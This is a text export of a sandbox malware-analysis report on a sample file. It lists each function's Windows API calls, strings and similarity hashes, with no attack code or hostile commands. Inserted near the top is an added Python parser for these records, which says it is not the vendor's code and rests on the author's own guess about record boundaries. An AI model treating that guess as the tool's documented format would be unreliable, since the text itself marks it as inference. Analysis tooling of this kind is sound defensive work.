                                                                                                                                                                            • Opcode ID: 66dab55481ceb671aad5b7663862feb9f580c793d976e5aa04b2e667b58a247f
                                                                                                                                                                            • Instruction ID: dcb21faf59621bace378fa0cdd909bbb06c0a9e062ce16f60f6e901d0c1511d5
                                                                                                                                                                            • Opcode Fuzzy Hash: 66dab55481ceb671aad5b7663862feb9f580c793d976e5aa04b2e667b58a247f
                                                                                                                                                                            • Instruction Fuzzy Hash: F611C234335320ABD715AF14FC4C9263BE8F74A381B04486AF585C3220C27298E0DF61
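The function records above (an APIs list with call-site refs, a Strings list with xrefs, the Memory Dump Source the function was lifted from, and the Similarity identifiers: API ID, API String ID, Opcode ID and the two fuzzy hashes) are what an analyst pulls out of a Joe Sandbox report to pivot on API sets, strings and opcode hashes across samples. The parser below is an added example, not Joe Sandbox's own code and not part of this report; SAMPLE is copied from two of the records on this page, with the "Download File" link text that the text export fuses onto .sdmp names left in so the stripping is exercised. The record-boundary rule (a new record starts at an APIs header, or at a Strings header once the previous record has received its Similarity block, since functions that make no API calls begin directly with Strings) is my reading of the layout above, not a documented format.

```python
"""Parse Joe Sandbox per-function disassembly records (APIs / Strings /
Memory Dump Source / Similarity blocks) into structured data for hunting.
Added illustration, not Joe Sandbox code; SAMPLE is copied from the report."""
import re
from dataclasses import dataclass, field
from typing import Optional

HEADERS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
RESIDUE = "Download File"  # link text the text export fuses onto .sdmp file names
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[^.\s(]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xrefs>[0-9A-Fa-f, ]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                    # raw argument cells; '?' means the value was not resolved
    ref: str                      # call-site address as printed in the report
    caller: Optional[str] = None  # set for 'Part of subcall function X:' entries

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (text, [xref addresses])
    source_file: str = ""
    offset: int = 0
    associated: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)  # API ID, Opcode ID, fuzzy hashes, ...

def parse_records(text):
    """A record starts at 'APIs', or at 'Strings' once the previous record already
    has its Similarity block (functions with no API calls begin with 'Strings')."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            if line in ("APIs", "Strings") and (rec is None or rec.similarity):
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None:
            continue  # text before the first record
        body = line.lstrip("•").strip()
        if body.endswith(RESIDUE):
            body = body[: -len(RESIDUE)].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section == "Strings":
            m = STRING_RE.match(body)
            if m:
                rec.strings.append((m["text"], m["xrefs"].replace(" ", "").split(",")))
        elif section == "Memory Dump Source":
            if body.startswith("Source File:"):
                parts = [p.strip() for p in body[len("Source File:"):].split(",")]
                rec.source_file = parts[0]
                rec.offset = next((int(p.split(":")[1], 16) for p in parts if p.startswith("Offset:")), 0)
            elif body.startswith("Associated:"):
                rec.associated.append(body[len("Associated:"):].strip())
        elif section == "Similarity":
            key, _, value = body.partition(":")
            rec.similarity[key.strip()] = value.strip()
    return records

def records_calling(records, api_name):
    """Functions whose direct or subcall API list names api_name."""
    return [r for r in records if any(a.name == api_name for a in r.apis)]

def records_with_string(records, needle):
    return [r for r in records if any(needle in s for s, _ in r.strings)]

# Two records copied from the report text above (constructed sample input).
SAMPLE = """\
APIs
• __fprintf_l.LIBCMT ref: 0025340E
• _strncpy.LIBCMT ref: 00253459
  • Part of subcall function 002589ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,0028E088,?,00000007,002533E2,?,?,00000050,6294DA82), ref: 00258A0A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ByteCharMultiWide__fprintf_l_strncpy
• String ID: $%s$@%s
• Opcode ID: b832841aeb95f1935ceb10d6589dfbb56b328adf4c27b2abb47816a8c206ee52
APIs
• InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0024FEBD,00000008,00000004,00252D42,?,?,?,?,00000000,0025ABB6,?), ref: 00257484
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0024FEBD,00000008,00000004,00252D42,?,?,?,?,00000000), ref: 0025749E
Strings
• Thread pool initialization failed., xrefs: 002574B6
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• Opcode ID: 1650fe9dec180560ca6ec558c1ef28962659cd62bc252406dce81e3abe0ab4a5
• Instruction Fuzzy Hash: 231106B1654309AFC3315F76AC889A7FFECEB55745F20082EF5DAC3200D6B059948B64
"""

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.similarity.get("API ID"), [a.name for a in r.apis], r.similarity.get("Opcode ID"))
```

Feed the whole text export of a report to parse_records and filter with records_calling or records_with_string; the Opcode ID and Instruction Fuzzy Hash values in each record's similarity dict are the identifiers to carry into a cross-sample lookup. The parser only stores the hashes; it does not reimplement Joe Sandbox's fuzzy-hash comparison.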
APIs
  • Part of subcall function 00253EAA: _swprintf.LIBCMT ref: 00253EEA
  • Part of subcall function 00253EAA: _strlen.LIBCMT ref: 00253F0B
  • Part of subcall function 00253EAA: SetDlgItemTextW.USER32(?,0028919C,?), ref: 00253F64
  • Part of subcall function 00253EAA: GetWindowRect.USER32(?,?), ref: 00253F9A
  • Part of subcall function 00253EAA: GetClientRect.USER32(?,?), ref: 00253FA6
• GetDlgItem.USER32(00000000,00003021), ref: 00241E88
• SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: ItemRectTextWindow$Client_strlen_swprintf
• String ID: 0$gI&
• API String ID: 2622349952-4135443430
• Opcode ID: de6ea629c287ea1fae2aed85e4380cb7fb76dea7d5c3134d8be79928ca9f0c17
• Instruction ID: 5be367aba842cddd7c4e08e75c131ac6d507cae18dc270e5bd1b319ff5364678
                                                                                                                                                                            • Opcode Fuzzy Hash: de6ea629c287ea1fae2aed85e4380cb7fb76dea7d5c3134d8be79928ca9f0c17
                                                                                                                                                                            • Instruction Fuzzy Hash: 70F0C238624249A7DF199F60EE0EBEA3BD8AF05345F048158FC48541E1C7B4CAF4EB50
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0026A843,00000000,?,00296150,?,?,?,0026A9E6,00000004,InitializeCriticalSectionEx,0027F7F4,InitializeCriticalSectionEx), ref: 0026A89F
• GetLastError.KERNEL32(?,0026A843,00000000,?,00296150,?,?,?,0026A9E6,00000004,InitializeCriticalSectionEx,0027F7F4,InitializeCriticalSectionEx,00000000,?,0026A79D), ref: 0026A8A9
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0026A8D1
Strings
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: f482b1b5fd60dd8dc4046a80b0e453b0643ea5fd1ebab1d2645d7de8bee682bb
• Instruction ID: 219c03f31dcddcf1887ada9f38a85305411bd68e2e13504ec3dc52de00de3dfb
• Opcode Fuzzy Hash: f482b1b5fd60dd8dc4046a80b0e453b0643ea5fd1ebab1d2645d7de8bee682bb
• Instruction Fuzzy Hash: 74E04F7079020AB7EF202FB0ED0AB183A59AF10B91F204030FD0DB84E1E76198E19E96
APIs
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
• Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
• Instruction ID: 6bfb522a5ea288f5e2d6e34be4382b3a7e7c9854079ceef630b6a14278d77e02
• Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
• Instruction Fuzzy Hash: CCA16A71E20386DFEB11CF28C8D17AEBBE4EF51310F148169E69C9B282C6749D59CB51
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00270481,?,00000000,?,00000001,?,?,00000001,00270481,?), ref: 00273685
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0027370E
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0026DBD1,?), ref: 00273720
• __freea.LIBCMT ref: 00273729
  • Part of subcall function 0027040E: RtlAllocateHeap.NTDLL(00000000,0026535E,?,?,00266C16,?,?,?,?,?,00265269,0026535E,?,?,?,?), ref: 00270440
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__freea
• String ID:
• API String ID: 2652629310-0
• Opcode ID: 9c3b82ba00a4045b869114ebc099bd9b89e1c5bd21d2db66b0e2a035eb3d13e2
• Instruction ID: eaca14e5df34de9e319376902444f11e2d4a92b7ebad59e0031c7c1b9121fc38
• Opcode Fuzzy Hash: 9c3b82ba00a4045b869114ebc099bd9b89e1c5bd21d2db66b0e2a035eb3d13e2
• Instruction Fuzzy Hash: 33319FB1A2020AABDF25DF65DC85DAF7BA9EB40350F144168FC08D6250EB35CEA0DB90
APIs
• __EH_prolog3.LIBCMT ref: 00251273
  • Part of subcall function 0025067E: GetVersionExW.KERNEL32(?), ref: 002506AF
• FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,0024350C,6294DAAA,00000000,?,?,002443F5,?,?,?,00000000), ref: 0025129A
• FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 002512D4
• _wcslen.LIBCMT ref: 002512DF
Similarity
• API ID: FoldString$H_prolog3Version_wcslen
• String ID:
• API String ID: 535866816-0
• Opcode ID: 2bc7d47ee5327705f8f7114aac8540130d613be0fcd09c46f965ce1d68715e5e
• Instruction ID: 2cb3041ece37778e8f0342657d05f763501df8b2241c225a3991b03ed6e2d2b4
• Opcode Fuzzy Hash: 2bc7d47ee5327705f8f7114aac8540130d613be0fcd09c46f965ce1d68715e5e
• Instruction Fuzzy Hash: A5117771A21126ABDB049FA9CD4AA7F7B7DAF45721F100209BD10E72C1CB7099B0CAF5
APIs
• __EH_prolog3.LIBCMT ref: 002562D4
• ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 002562EB
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00256328
• _wcslen.LIBCMT ref: 00256338
Similarity
• API ID: EnvironmentExpandStrings$H_prolog3_wcslen
• String ID:
• API String ID: 3741103063-0
• Opcode ID: e5dd8ab55ec7d2a3eb51938d2cffdf2386c192c0695bbd3218753fe5b224a7c7
• Instruction ID: f6de561be27674f69cfa7bd408d28efcbad990295cab94a37081239af986b970
• Opcode Fuzzy Hash: e5dd8ab55ec7d2a3eb51938d2cffdf2386c192c0695bbd3218753fe5b224a7c7
• Instruction Fuzzy Hash: BB11E070A2121AAF9B049FA8DD899BFF779FF40311B50011DB801E7240DB309DA4CBE8
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0027198B,00000000,00000000,00000000,00000000,?,00271B88,00000006,FlsSetValue), ref: 00271A16
• GetLastError.KERNEL32(?,0027198B,00000000,00000000,00000000,00000000,?,00271B88,00000006,FlsSetValue,00280DD0,FlsSetValue,00000000,00000364,?,002700D7), ref: 00271A22
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0027198B,00000000,00000000,00000000,00000000,?,00271B88,00000006,FlsSetValue,00280DD0,FlsSetValue,00000000), ref: 00271A30
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                            • Opcode ID: 93ddd973cba3ed1b8b4dec8c512155d1b7491771facd41c8c5b54afc00600918
                                                                                                                                                                            • Instruction ID: 4e892e306295459caba5b6d494e8ead4058475a367ecac44d6edee1ff27696a5
                                                                                                                                                                            • Opcode Fuzzy Hash: 93ddd973cba3ed1b8b4dec8c512155d1b7491771facd41c8c5b54afc00600918
                                                                                                                                                                            • Instruction Fuzzy Hash: E601D4366662339BC7218EBCAC48E567798AF04BA1B214624ED0ED3240D730D870C6E0
APIs
• __EH_prolog3.LIBCMT ref: 00251310
• GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,002517FB,?,?,\\?\,6294DA82,?,?,?,00000000,0027A279,000000FF), ref: 00251319
• GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,0027A279,000000FF), ref: 00251348
• _wcslen.LIBCMT ref: 00251351
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: CurrentDirectory$H_prolog3_wcslen
• String ID:
• API String ID: 19219720-0
• Opcode ID: 538557d8e1b56da6ae0610df55044b748d4020a7be1f6014378c7641a742a823
• Instruction ID: c25f6dfebbac96f92e0e22c725c63ba24f56d18f5ea8dffca00b115a838a2ca3
• Opcode Fuzzy Hash: 538557d8e1b56da6ae0610df55044b748d4020a7be1f6014378c7641a742a823
• Instruction Fuzzy Hash: 6D01DB71D20126BB8B04AFF49D159BFBB7DAF81720B100209B915E7241CF744960CAE5
APIs
• GetDC.USER32(00000000), ref: 0025EB77
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0025EB86
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0025EB94
• ReleaseDC.USER32(00000000,00000000), ref: 0025EBA2
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: 86e461a80422a95b0f469409fb1a000001ee93cd757534ed12e1ccbc9a82cc8b
• Instruction ID: 3f665b7d3da5aead2e4254b2eebd857a52c24d9f5ce319f7e9ba05ce2b442b4f
• Opcode Fuzzy Hash: 86e461a80422a95b0f469409fb1a000001ee93cd757534ed12e1ccbc9a82cc8b
• Instruction Fuzzy Hash: 82E01231A5AF30ABD7221B70BD0DB8B3F54AF19B53F010183FB05AA1D0C6B044008B98
APIs
• __Init_thread_footer.LIBCMT ref: 00258294
  • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
  • Part of subcall function 0026087E: __EH_prolog3_GS.LIBCMT ref: 00260885
  • Part of subcall function 0026087E: GetLastError.KERNEL32(0000001C,00258244,?,00000000,00000086,?,6294DA82,?,?,?,?,?,00000000,0027A75D,000000FF), ref: 0026089D
  • Part of subcall function 0026087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,0027A75D,000000FF), ref: 002608D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
• String ID: %ls
• API String ID: 1279724102-3246610740
• Opcode ID: a818b0f7265bd9c7d131e9f2082b28acbf900e016f200b3f8f94c81c46496773
• Instruction ID: e7a37c34e774349f528b4bc9ee8b51543a5be7c9e743cf30b01fc59857e24752
• Opcode Fuzzy Hash: a818b0f7265bd9c7d131e9f2082b28acbf900e016f200b3f8f94c81c46496773
• Instruction Fuzzy Hash: 62B1C130861209EADB38EF50CD46FAE7BB5BF15346F204419F846621E1DBB15A78EF84
APIs
  • Part of subcall function 0027246B: GetOEMCP.KERNEL32(00000000,?,?,002726F4,?), ref: 00272496
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00272739,?,00000000), ref: 00272914
• GetCPInfo.KERNEL32(00000000,9'',?,?,?,00272739,?,00000000), ref: 00272927
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID: 9''
• API String ID: 546120528-2872311811
• Opcode ID: 96e8627ac5f0889b48df6671778723dcda1b3d2e8a8699af122c95be247b8913
• Instruction ID: 884784ae571fcf9900168d7e5d940f9e7e953e3d81a5a5a6efe197306c525962
• Opcode Fuzzy Hash: 96e8627ac5f0889b48df6671778723dcda1b3d2e8a8699af122c95be247b8913
• Instruction Fuzzy Hash: EA513770920247DFDB25CF35C8916BBBBE5EF41300F28C06ED19E87252D6759999CB90
APIs
• _free.LIBCMT ref: 00271FD4
  • Part of subcall function 0026ACBB: IsProcessorFeaturePresent.KERNEL32(00000017,0026AC8D,0026535E,?,?,00000000,0026535E,00000016,?,?,0026AC9A,00000000,00000000,00000000,00000000,00000000), ref: 0026ACBD
  • Part of subcall function 0026ACBB: GetCurrentProcess.KERNEL32(C0000417,?,0026535E), ref: 0026ACDF
  • Part of subcall function 0026ACBB: TerminateProcess.KERNEL32(00000000,?,0026535E), ref: 0026ACE6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
• Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
• Instruction ID: 2b8c6188cd45579beb8c138f01c9c269efe60454573d56fcf7d88650271ce05f
• Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
• Instruction Fuzzy Hash: 4651B075E1021AEFDF14DFA8C881AADBBB5FF48310F248169E848E7741E7759E218B50
APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00272568
Strings
Memory Dump Source
• Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
Similarity
• API ID: Info
• String ID: $}*'
• API String ID: 1807457897-3204145712
• Opcode ID: 657bf1320d3de5c5f5999ef76061e4f91062c29d5ad664b52f4bdafb76681a37
• Instruction ID: d43e746c0d302023e45af0b1322ab5828605f9f934ec9374d8c2f6ebc8303fbe
• Opcode Fuzzy Hash: 657bf1320d3de5c5f5999ef76061e4f91062c29d5ad664b52f4bdafb76681a37
• Instruction Fuzzy Hash: 07412AB0514258DFDF268E24CC84BF6BBFDEB45304F2444EDE58E86142D235AA69DF60
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 002579F7: GetSystemTime.KERNEL32(?,00000000), ref: 00257A0F
                                                                                                                                                                              • Part of subcall function 002579F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00257A1D
                                                                                                                                                                              • Part of subcall function 002579A0: __aulldiv.LIBCMT ref: 002579A9
                                                                                                                                                                            • __aulldiv.LIBCMT ref: 0024F162
                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,6294DA82,?,?,00000000,?,00000000,00279F3D,000000FF), ref: 0024F169
                                                                                                                                                                              • Part of subcall function 00241150: _wcslen.LIBCMT ref: 0024115B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                                                                                                                                                            • String ID: .rartemp
                                                                                                                                                                            • API String ID: 3789791499-2558811017
                                                                                                                                                                            • Opcode ID: 17d65bcc50821241cb0bc041a850dbd240927ca7ed9265176fa1b2ecafc0358a
                                                                                                                                                                            • Instruction ID: 178118f115450535aa25007c5a8436112f2b446797ceaf39207ddc3b2a35999d
                                                                                                                                                                            • Opcode Fuzzy Hash: 17d65bcc50821241cb0bc041a850dbd240927ca7ed9265176fa1b2ecafc0358a
                                                                                                                                                                            • Instruction Fuzzy Hash: 35418071920249ABDF18EF74CC46EEEB7A8EF54310F444129F91993281EB749B68CF60
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0025DAD5
                                                                                                                                                                              • Part of subcall function 00250360: __EH_prolog3.LIBCMT ref: 00250367
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                                            • String ID: Shell.Explorer$about:blank
                                                                                                                                                                            • API String ID: 431132790-874089819
                                                                                                                                                                            • Opcode ID: 89d766b82a0dab7d8f906b6b92c7c19f9f5a7b218b9d3dfcb0341cbb3553ef2a
                                                                                                                                                                            • Instruction ID: e30798e8951f25bda510e3e4d75ae5f679acdd2bc1b0eb3a67ab5da3f45b1076
                                                                                                                                                                            • Opcode Fuzzy Hash: 89d766b82a0dab7d8f906b6b92c7c19f9f5a7b218b9d3dfcb0341cbb3553ef2a
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E418070620212DFDB18DFA4C855B2A77B2AF88706F15809DED069F292DB70AD54CF54
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0025D7F2
                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0025D8E8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                             • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                             • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog3_ShowWindow
                                                                                                                                                                            • String ID: qI&
                                                                                                                                                                            • API String ID: 4203566401-1506060996
                                                                                                                                                                            • Opcode ID: feca26ea35dee679413e8261a038e7387af45c6dc32bd5187a26f3b2e5b582ec
                                                                                                                                                                            • Instruction ID: 1575d85de2886f1a6d6f9bd39070ad00469559e495656488537eb3e922ec62ee
                                                                                                                                                                            • Opcode Fuzzy Hash: feca26ea35dee679413e8261a038e7387af45c6dc32bd5187a26f3b2e5b582ec
                                                                                                                                                                            • Instruction Fuzzy Hash: 57416B30A2062AAFCB15DFA4DC89A9DBBF5FF0C311B044029F909A7261DB71AC55CF94
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                              • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 0026017B
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000067,?), ref: 002601B9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
